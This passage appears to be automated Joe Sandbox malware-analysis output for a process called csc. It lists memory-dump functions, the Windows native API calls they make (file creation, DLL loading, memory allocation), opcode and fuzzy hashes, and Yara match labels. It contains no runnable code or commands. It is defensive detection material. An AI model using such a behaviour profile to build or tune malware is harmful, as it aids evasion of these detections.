Snapshot File: hcaresult_5_2_5100000_csc.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction ID: 51d2228eff5545b0ac5efcd94f015b204564650c63d0afebbfd93b64ad6b756c
Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction Fuzzy Hash: 79515E70918A8C8FDB69EF68C8846EEBBF4FB98304F40462ED44AD7251DF749645CB41

Function 0041A3B2 Relevance: 1.6, APIs: 1, Instructions: 57
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
Instruction ID: a7a1a1cfa9bd20287bf16b9f77af049775cbda1b728cc0b5c91c8d781c512f10
Opcode Fuzzy Hash: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
Instruction Fuzzy Hash: E001EDB6200108AFCB08DF99DC84DEB77ADEF8C724F158659FA1D97290C630E951CBA4

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Function 0041A35B Relevance: 1.5, APIs: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
Instruction ID: f7f4107286774cdf51585c7b95314371371209a0b209ae894d56bd91292c74bc
Opcode Fuzzy Hash: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
Instruction Fuzzy Hash: 2801B2B2201108AFCB58DF99DC95EEB77A9EF8C754F158248FA0DD7241D630E851CBA4

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Function 0041A48B Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
Instruction ID: b3fdf63f4ad5ff6f1f79f001bf06b592d21b89135aeb14a04be9777f4d5fd233
Opcode Fuzzy Hash: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
Instruction Fuzzy Hash: EAE08C712402046BD710EB98CC46FA73BA8EF88724F248499BA0C5B242C131E90187D0

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Function 05602D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602D3A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d63af0f16ba26e89763d08fa87002c15c3e2858b6d0b868065174ad2b2d88d2
Instruction ID: e69121020fd4f5a2f1c47832524d99f2a53db1e1f3d51a26d6d74bf6b787e6d5
Opcode Fuzzy Hash: 9d63af0f16ba26e89763d08fa87002c15c3e2858b6d0b868065174ad2b2d88d2
Instruction Fuzzy Hash: A190022234140003D140755854586165015D7E2301F99D011E4414754DDE1589569326

Function 05602D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602D1A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef8cf03908365b1cc1ae741c181f07c780a3e908589a64b258db5e8c9b1eb4b5
Instruction ID: c66fd840b1d71bf2188eb34655399e6e20ea6b14b5994a62efa2fc4bf636528b
Opcode Fuzzy Hash: ef8cf03908365b1cc1ae741c181f07c780a3e908589a64b258db5e8c9b1eb4b5
Instruction Fuzzy Hash: 6190022A25340003D1807558544861A101587D2202FD9D415A4015758DCE1589699325

Function 05602DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602DFA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86b27c05bf364befdd65ccf1c5387e23b12fa7d3b9fc8c13d5c6b46fcac0d816
Instruction ID: 0fc4998652220c9dfb0e3073a39233c1e612adac8a7c5fea8f8d5d47379da4fa
Opcode Fuzzy Hash: 86b27c05bf364befdd65ccf1c5387e23b12fa7d3b9fc8c13d5c6b46fcac0d816
Instruction Fuzzy Hash: F590023224140413D11175584544717101987D1241FD9C412A4424758E9B568A52E225

Function 05602DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602DDA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dac42a001c8a6781562a9034ccaa2bd7042c99bc7dc3cbb06b8cf196f4f5399e
Instruction ID: be0200d34177c45594e7c1cf07964af3c465a847c06c2b640e40ef7f2db2204a
Opcode Fuzzy Hash: dac42a001c8a6781562a9034ccaa2bd7042c99bc7dc3cbb06b8cf196f4f5399e
Instruction Fuzzy Hash: 42900222282441535545B5584444517501697E12417D9C012A5414B50D8A269956D725

Function 05602C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602C7A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63ecc8cf4fadafb7da3254fe60b32c0553789e16300cb664a05d2df152b15225
Instruction ID: 46d8d30c5fb035ae0f44aed13723f4795a6054ad69501c0cc328d138b11cb867
Opcode Fuzzy Hash: 63ecc8cf4fadafb7da3254fe60b32c0553789e16300cb664a05d2df152b15225
Instruction Fuzzy Hash: 4190023224148803D1107558844475A101587D1301F9DC411A8424758E8B958991B225

Function 05602CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602CAA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34c1762809c0e8fcbaa01c5bef3c88a3d7d380360a334baef61f5edd387a8ca8
Instruction ID: fe7f7cd40b8e5d0dd75a16e27de0c5ddc95c1ea9aa2511dd6ce1401a003c0558
Opcode Fuzzy Hash: 34c1762809c0e8fcbaa01c5bef3c88a3d7d380360a334baef61f5edd387a8ca8
Instruction Fuzzy Hash: 1A90023224140403D10079985448656101587E1301F99D011A9024755FCB658991A235

Function 05602F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602F3A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6d6b6666144f83abc29283923f0e5a3e273f6bd5838b9b644a95cca262f355d
Instruction ID: 56b3ca4d875268a2632df501482c92708169bf6da86890cb6947e1a81848746d
Opcode Fuzzy Hash: f6d6b6666144f83abc29283923f0e5a3e273f6bd5838b9b644a95cca262f355d
Instruction Fuzzy Hash: 3A90026238140443D10075584454B161015C7E2301F99C015E5064754E8B19CD52A22A

Function 05602FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602FEA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3117aedd3ccd6bbf597e4d923acb7935e4b738f2824f54ba14f06ec71051259
Instruction ID: 06e75f4c1a7d5137c877eb133f1f13cb2dd3899b929d8df98433bde72380e3a1
Opcode Fuzzy Hash: b3117aedd3ccd6bbf597e4d923acb7935e4b738f2824f54ba14f06ec71051259
Instruction Fuzzy Hash: D1900222251C0043D20079684C54B17101587D1303F99C115A4154754DCE1589619625

Function 05602FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602FBA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2eaa63cbada869cf345bf5f8d1536347b771a307d1342918328c7420e82b9804
Instruction ID: ef1defca36a063c5978dc1e0de7951ba6f963b1764a02ccc88233c183dbb0fcd
Opcode Fuzzy Hash: 2eaa63cbada869cf345bf5f8d1536347b771a307d1342918328c7420e82b9804
Instruction Fuzzy Hash: 72900222641400434140756888849165015ABE2211799C121A4998750E8A5989659769

Function 05602F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602F9A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bc12731be051e515852e73406ddb3c35768c083077a8b3b311b2ae6fd1a29cb
Instruction ID: 5cf32ebfc7dc0603bd7aa23f9d5ba192178ba3516ca5790f905c683460068511
Opcode Fuzzy Hash: 5bc12731be051e515852e73406ddb3c35768c083077a8b3b311b2ae6fd1a29cb
Instruction Fuzzy Hash: 5890023224180403D1007558485471B101587D1302F99C011A5164755E8B258951A675

Function 05602EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602EAA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 927301794b2cfb6129d3acb8cd4f30f0ee4dedfe4bdaa6daad41ff44e713f5dd
Instruction ID: 99b7b1f874a1a7ec982b9d2655b8e28efd9e622864f7f1cc0ed42b12dd36962a
Opcode Fuzzy Hash: 927301794b2cfb6129d3acb8cd4f30f0ee4dedfe4bdaa6daad41ff44e713f5dd
Instruction Fuzzy Hash: 6590027224140403D14075584444756101587D1301F99C011A9064754F8B598ED5A769

Function 05602E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602E8A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f83ffa94f2b6de3551abd1ce9256e4a6ab2b7132c125c9dac542185b68a0f6e2
Instruction ID: aeb8ce6f36c1e5bce16ba775255c90f20e0e3cce8d52cd80a5872476966d4894
Opcode Fuzzy Hash: f83ffa94f2b6de3551abd1ce9256e4a6ab2b7132c125c9dac542185b68a0f6e2
Instruction Fuzzy Hash: D490022264140503D10175584444626101A87D1241FD9C022A5024755FCF258A92E235

Function 05602B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602B6A

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f5600a9663d1fd72dcc823d0093268aa0c0ac3ae1eeedf3a23ccb2c3d541521
Instruction ID: fec3725cb9a763afea0572add02936e801ece8a4ae0ddbf394832aab69792ecc
Opcode Fuzzy Hash: 6f5600a9663d1fd72dcc823d0093268aa0c0ac3ae1eeedf3a23ccb2c3d541521
Instruction Fuzzy Hash: 7690026224240003410575584454626501A87E1201B99C021E5014790ECA258991A229

Function 05602BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602BFA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3e48d343f53a5a9e17c8ff46bfa7f79a01826c622f7f3bcc3aa228993715f65
Instruction ID: 00f914185bc817edaf9276f0d1a200bb870ac001659a7f6fe6f88e09e7cb6529
Opcode Fuzzy Hash: f3e48d343f53a5a9e17c8ff46bfa7f79a01826c622f7f3bcc3aa228993715f65
Instruction Fuzzy Hash: ED90023224140803D1807558444465A101587D2301FD9C015A4025754ECF158B59B7A5

Function 05602AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05602ADA

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01f043b77cab89314a7de5a14c533dee15ee78f2364bf9083f165b44cc59ad17
Instruction ID: af4dce7625806dade524113889601014407f2c9bbff1ee26cf009e958f85eefb
Opcode Fuzzy Hash: 01f043b77cab89314a7de5a14c533dee15ee78f2364bf9083f165b44cc59ad17
Instruction Fuzzy Hash: 8C900226251400030105B9580744517105687D6351399C021F5015750DDB2189619225

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Function 0041A6AB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
Instruction ID: ca5c2ad009bb5830261af26d6cd8d5f5f20ef4a650c85af14dc2c9a9921a2f81
Opcode Fuzzy Hash: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
Instruction Fuzzy Hash: 32D02BF91092845FD700DF74DD808DB7754AF85318738844EF84D03303C130D426A6B2

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_csc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
Instruction ID: deec3d3271cf7ae617df0fac63ab8d80f0a55d98960cf64c01aa098855739ce5
Opcode Fuzzy Hash: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
Instruction Fuzzy Hash: DE01B531A8032976E721A6A59C43FEE772CAB41B54F14015EFE04BA1C2E6A8690547EA

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

